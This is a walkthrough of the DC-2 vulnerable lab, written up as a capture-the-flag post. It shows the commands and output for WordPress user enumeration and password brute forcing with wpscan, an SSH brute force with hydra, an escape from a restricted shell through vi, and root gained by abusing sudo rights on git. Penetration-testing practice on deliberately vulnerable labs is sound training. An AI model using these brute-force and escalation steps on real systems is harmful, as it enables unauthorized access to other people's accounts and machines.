Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag. The flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts is the final flag.
I loved the previous box and I was excited to solve this. So, without further ado, let’s start with our basic nmap scan to find out the open ports and services.
root :: ~ » nmap -A -p- 192.168.43.140 Nmap scan report for DC-2 (192.168.43.140) Host is up (0.00067s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-generator: WordPress 4.7.10 |_http-server-header: Apache/2.4.10 (Debian) | http-title: DC-2 – Just another WordPress site |_Requested resource was http://dc-2/ 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
As you can see, there are 2 open ports. One of them looks like a Wordpress installation on port 80 and an out of ordinary SSH service on port 7744. I mean it’s not the standard SSH port… After visiting the site, there was a menu named “Flag”. We are going pretty fast!
The clue was obvious to me. There is a tool called “cewl”, which generates passwords based on the current target. I prepared my wordlist by typing the below command, where
-d 3 specifies the depth that we are exploring and
-w <file> creates a file with potential passwords.
root :: /opt/cewl » ./cewl.rb -d 3 -w ~/Downloads/passwords.txt http://dc-2/ CeWL 5.4.5 (Exclusion) Robin Wood (firstname.lastname@example.org) (https://digi.ninja/) root :: /opt/cewl » cd root :: ~ » cd Downloads root :: ~/Downloads » wc -c passwords.txt 1689 passwords.txt
I successfully gathered 1689 words, but the login page is yet to be discovered. I ran
nikto just in case and I haven’t even mentioned
wpscan, which is an excellent tool for Wordpress sites and it has the ability to brute force the login page! Let’s see what turned up!
root :: ~ » wpscan --enumerate --url http://dc-2/ _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 2.9.4 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_ _______________________________________________________________ [+] URL: http://dc-2/ [+] Interesting header: LINK: <http://dc-2/index.php/wp-json/>; rel="https://api.w.org/" [+] Interesting header: LINK: <http://dc-2/>; rel=shortlink [+] Interesting header: SERVER: Apache/2.4.10 (Debian) [+] XML-RPC Interface available under: http://dc-2/xmlrpc.php [HTTP 405] [+] Found an RSS Feed: http://dc-2/index.php/feed/ [HTTP 200] [!] Detected 1 user from RSS feed: +-------+ | Name | +-------+ | admin | +-------+ [!] Includes directory has directory listing enabled: http://dc-2/wp-includes/ [+] Enumerating WordPress version ... [+] WordPress version 4.7.10 (Released on 2018-04-03) identified from meta generator, links opml [!] 10 vulnerabilities identified from the version number --- snip --- [+] Enumerating usernames ... [+] We identified the following 3 users: +----+-------+-------------+ | ID | Login | Name | +----+-------+-------------+ | 1 | admin | admin | | 2 | tom | Tom Cat | | 3 | jerry | Jerry Mouse | +----+-------+-------------+ [!] Default first WordPress username 'admin' is still used --- snip ---
Well, it looks like we have more than one user to deal with. Let’s run
wpscan again, but this time supply our custom password list. Here is the relevant information from the output:
root :: ~/Downloads » wpscan --url http://dc-2/ --wordlist passwords.txt --- snip --- [+] Starting the password brute forcer Brute Forcing 'admin' Time: 00:00:09 <=============== > (237 / 239) 99.16% ETA: 00:00:00 [+] [SUCCESS] Login : tom Password : parturient [+] [SUCCESS] Login : jerry Password : adipiscing Brute Forcing 'jerry' Time: 00:00:09 <=============== > (236 / 239) 98.74% ETA: 00:00:00 +----+-------+-------------+------------+ | ID | Login | Name | Password | +----+-------+-------------+------------+ | 1 | admin | admin | | | 2 | tom | Tom Cat | parturient | | 3 | jerry | Jerry Mouse | adipiscing | +----+-------+-------------+------------+ --- snip ---
We found 2 passwords out of three. It’s not bad, right? Time to log in… First, I logged in as
tom but didn’t find anything useful, so I switched to
jerry. However, I found the next flag with
jerry‘s account in a blog post.
I thought that searching for a working exploit or uploading a PHP reverse shell would be a waste of time. So, instead of doing all those, I tried to brute force the SSH service with the same wordlist and usernames (I created a text file for the three usernames).
root :: ~ » nvim users.txt root :: ~ » hydra -L users.txt -P ~/Downloads/passwords.txt ssh://dc-2:7744 Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task [DATA] attacking ssh://dc-2:7744/ [STATUS] 170.00 tries/min, 170 tries in 00:01h, 546 to do in 00:04h, 16 active [STATUS] 124.67 tries/min, 374 tries in 00:03h, 342 to do in 00:03h, 16 active [ssh] host: dc-2 login: tom password: parturient 1 of 1 target successfully completed, 1 valid password found
I got lucky with
tom, because he re-used his Wordpress account password…
root :: ~ » ssh tom@dc-2 -p 7744 The authenticity of host '[dc-2]:7744 ([192.168.43.140]:7744)' can't be established. ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[dc-2]:7744,[192.168.43.140]:7744' (ECDSA) to the list of known hosts. tom@dc-2's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. tom@DC-2:~$
The default shell for
tom was rbash. It’s like a restricted shell that we want to escape to gain better control over the system. I was reading about different techniques and decided to try a trick with the
tom@DC-2:~$ -rbash: /dev/null: restricted: cannot redirect output bash: _upvars: `-a0': invalid number specifier -rbash: /dev/null: restricted: cannot redirect output bash: _upvars: `-a0': invalid number specifier tom@DC-2:~$ vi
Inside the editor, I typed
:set shell=/bin/sh and finally
:shell. This will launch the standard Unix shell. After that, we can issue the
/bin/bash command to switch to the Bash shell. I also noticed that we are limited in usable commands because the
$PATH environment variable only contained the
/home/tom/usr/bin path. So, I added the missing directories and printed out the third flag.
$ /bin/bash tom@DC-2:~$ echo $PATH /home/tom/usr/bin tom@DC-2:~$ export PATH=/bin/:/usr/bin/:/usr/local/bin:$PATH tom@DC-2:~$ ls flag3.txt usr tom@DC-2:~$ cat flag3.txt Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
I have to admit, these hints are getting out of hand 😁
I switched to
jerry‘s account using the previously acquired Wordpress password. The fourth flag was in the home directory.
tom@DC-2:~$ su jerry Password: jerry@DC-2:/home/tom$ cd jerry@DC-2:~$ ls flag4.txt jerry@DC-2:~$ cat flag4.txt Good to see that you've made it this far - but you're not home yet. You still need to get the final flag (the only flag that really counts!!!). No hints here - you're on your own now. :-) Go on - git outta here!!!!
We got a pretty obvious hint again. I checked the allowed commands with
sudo -l and yes, we can; in fact, run the
git command without knowing the root password.
jerry@DC-2:~$ sudo -l Matching Defaults entries for jerry on DC-2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User jerry may run the following commands on DC-2: (root) NOPASSWD: /usr/bin/git
git has an embedded editor for the help pages, where we can execute arbitrary commands. I chose to simply execute a Bash shell. Finally, I printed out the final flag.
jerry@DC-2:~$ sudo git help status root@DC-2:/home/jerry# root@DC-2:/home/jerry# cd root@DC-2:~# ls final-flag.txt root@DC-2:~# cat final-flag.txt __ __ _ _ _ _ / / /\ \ \___| | | __| | ___ _ __ ___ / \ \ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ / \ /\ / __/ | | | (_| | (_) | | | | __/\_/ \/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/ Congratulations!!! A special thanks to all those who sent me tweets and provided me with feedback - it's all greatly appreciated. If you enjoyed this CTF, send me a tweet via @DCAU7.
If you found this article helpful, please share to help others with similar interest find it! + Feedback and donations are always welcome!